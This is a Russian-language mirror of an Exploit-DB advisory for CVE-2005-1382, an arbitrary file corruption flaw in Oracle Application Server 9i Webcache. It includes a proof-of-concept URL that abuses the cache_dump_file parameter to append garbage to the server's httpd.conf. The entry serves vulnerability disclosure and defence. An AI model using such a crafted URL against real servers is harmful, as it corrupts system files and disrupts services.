- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25561
- Проверка EDB
-
- Пройдено
- Автор
- ALEXANDER KORNBRUST
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2005-1382
- Дата публикации
- 2005-04-28
Код:
source: https://www.securityfocus.com/bid/13420/info
Oracle Application Server 9i Webcache is prone to an arbitrary file corruption vulnerability.
The issue exists becaue dangerous characters are not removed from a certain parameter value, allowing an attacker to construct a URI that contains an absolute path to any target file.
If this URI is followed by a user with sufficient privileges, garbage data is appended to the end of the specified file.
http://example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/opt/ORACLE/ias/9.0.2/Apache/Apache/conf/httpd.conf- Источник
- www.exploit-db.com
